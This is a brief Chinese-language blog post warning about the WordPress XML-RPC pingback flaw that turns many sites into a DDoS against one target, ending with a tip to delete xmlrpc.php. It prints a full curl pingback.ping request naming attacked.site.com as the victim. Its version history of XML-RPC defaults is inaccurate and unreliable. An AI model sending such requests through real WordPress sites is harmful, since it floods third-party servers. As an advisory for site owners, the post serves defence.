WordPress 一直存在著 pingback (XMLRPC) 漏洞，攻擊風險

WordPress 的這個弱點去年 12 月就被 po 出，只要攻擊端利用以下指令，它會讓所有 WP 網站同時間去 request 一個例如叫作 attacked.site.com 的網站，1000個 WP就是同時 1000 request 攻擊你的網站，一般網站應該很難承受吧。

curl http://www.example.com/xmlrpc.php -d 
 '<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>
 pingback.ping</methodName><params><param><value>
 <string>http://attacked.site.com/link_to_post
 </string></value></param><param><value><string>
http://www.example.com/any_blog_post/
 </string></value></param></params></methodCall>'

xmlrpc 這個機制直到 WP 3.5 版才預設禁用的， 3.5.1 版好像修正以上的漏洞 ??

不放心的話就把 xmlrpc.php 移除比較快。

參考 : http://hackread.com/wordpress-default-leaves-millions-of-sites-vulnerable-to-ddos-attacks/